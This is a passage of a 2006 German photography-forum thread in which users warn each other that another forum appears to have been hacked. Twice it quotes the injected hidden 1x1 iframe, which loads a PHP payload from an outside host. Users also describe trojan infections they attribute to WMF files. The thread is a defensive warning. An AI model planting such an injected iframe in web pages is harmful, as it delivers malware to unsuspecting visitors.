SonyUserforum
Seite 2 von 4 1 2 34
40 Beiträge dieses Themas auf einer Seite anzeigen

SonyUserforum (https://www.sonyuserforum.de/forum/index.php)
-   Café d`Image (https://www.sonyuserforum.de/forum/forumdisplay.php?f=94)
-   -   Böse Überraschung im anderen Forum (https://www.sonyuserforum.de/forum/showthread.php?t=24498)

HolgerB 23.01.2006 19:19
Ich surfe mit Firefox. Auf der angesprochenen Seite ist ganz links oben ein winziges Frame zu sehen, in dem irgendeine php auf toolbardollars(dot)biz geladen werden soll.

Hat jemand ne Ahnung, um was es sich dabei handelt? Und wie das Frame da hin kommt?

Schöne Grüße, Holger

joki 23.01.2006 19:20
Zitat:
Zitat von A2Freak
Holla die Waldfee, mein Virenscanner schreit auch Zeter und Mordio. Ich gehe über AOL rein.
Und ich bleib da schön draussen - testet Ihr mal alle Eure Virenscanner... :evil: :evil: :roll:

yaku 23.01.2006 19:21
Zitat:
Zitat von Ditmar
Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! :cry:
Na dann wirst Du, wie ich mitgelesen habe, wohl nach Rußland gehen müssen.
Von den Temperaturen bist Du ja schon etwas vorbereitet. :lol:

XxJakeBluesxX 23.01.2006 19:24
Mit Opera 8.50 & Kaspersky Anti-Virus Personal habe ich meine Ruhe... :top:

ManniC 23.01.2006 19:36
Zitat:
Zitat von HolgerB
Und wie das Frame da hin kommt?
Ich schätze mal mit DHL & Freeway-Paketmarke :D

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:
Zitat:
<head>
<bugame src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
<title>Portal</title> .........
Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.

HolgerB 23.01.2006 19:39
Zitat:
Zitat von ManniC
Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.
Meiner offenbar auch. Gottseidank.

Zitat:
Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.
:top:

Schöne Grüße, Holger

Bohne 23.01.2006 20:04
Hallo
ich war Mittag im Minolta Forum und dabei hat es mich voll erwischt der Virenscanner spielte verrückt und konnte weder desinfizieren noch in die Quarantäne verschieben . Der Rechner machte was er wollte, mal an dann gleich wieder aus, Desktop wurde erst grün dann blau und schwarz.
dannach ungefähr 7-8 Fehlermeldungen die so schnell kamen das ich nur noch rote Kreuze gesehen habe. :roll: :roll:
der Virenscanner hat dann 12 Viren und Trojaner in C:/Dokumente und Einstellungen gefunden . Teilweise konnte er sie unschädlich machen teilweise nicht. 7 Trojaner sind geblieben. Also System neu aufgesetzt und jetzt bin ich erst mal mit dem Gröbsten fertig.

Ps: Ich halte mich erst mal ein paar Tage von dort fern.
Muss wohl was mit WMF Files sein.

Also schön Vorsichtig :!: :!: :twisted:

Gruß Thomas

yaku 23.01.2006 20:04
Wäre es nicht eine Überlegung wert ob man die User in unserem Forum nicht per E-Mail benachrichtigt, wenn sich hier auch einmal soetwas einschleichen sollte.

PauloG 23.01.2006 20:11
Zitat:
Zitat von Ditmar
hatte selber vor ein paar Wochen einen Trojaner auf dem Rechner, und große Mühe den wieder los zu werden. War Hartnäckig bis zum geht nicht mehr, hab mein ganzes System neu aufspielen müssen.
Man kann nur Hoffen das diese für mich kriminellen Macher mal zu fassen bekommt.
Sollte mir so einer mal in die Finger kommen möchte ich mal behaupten hat derjenige ein Problem, nur leiderläuft mir keiner über den Weg! Weinen
Vielleicht war der im System32-Ordner, dann stellt die Systemwiederherstellung, wenn aktiv(standardmäßig), den Parasiten nach dem Entfernen wieder her. System und Virenscanner spielen dann quasi Ping-Pong :D

emundem164 23.01.2006 20:11
Zitat:
Zitat von ManniC
Zitat:
Zitat von HolgerB
Und wie das Frame da hin kommt?
Ich schätze mal mit DHL & Freeway-Paketmarke :D

Nee im Ernst:

Es könnte sich um einen Hack der Forumssoftware handeln.

Der Quellcode der Indexseite weist im <head>-tag eine Veränderung auf:
Zitat:
<head>
<bugame src="http://toolbardollars.biz/dl/adv553.php" width=1 height=1></iframe>
<title>Portal</title> .........
Den einleitenden <iframe>-Tag hat mein Firefox wohl gefressen, so dass der Code nicht zur Ausführung kommt.

Übrigens werden wir im Team u.a. aus solchen Gründen immer heftig emsig wenn es darum geht, ein Security-Update in unsere Forumssoftware einzuspielen.
hmm.. hab grad auch ein wenig rumgespielt... das ganze scheint im firefox gewollt nicht zu klappen, denn der macht ja bekanntlich die wmf.dateien nicht direkt auf. wenn man die adv553.php im firefox öffnet, ist die nämlich praktisch leer.
im ie aber kann man schön den code-sehen wie wieder etliche iframes aufgemacht werden...
naja, der firmenrechner hier war zum glück gewappnet ;)

gruss
michel


Alle Zeitangaben in WEZ +2. Es ist jetzt 19:38 Uhr.
Seite 2 von 4 1 2 34
40 Beiträge dieses Themas auf einer Seite anzeigen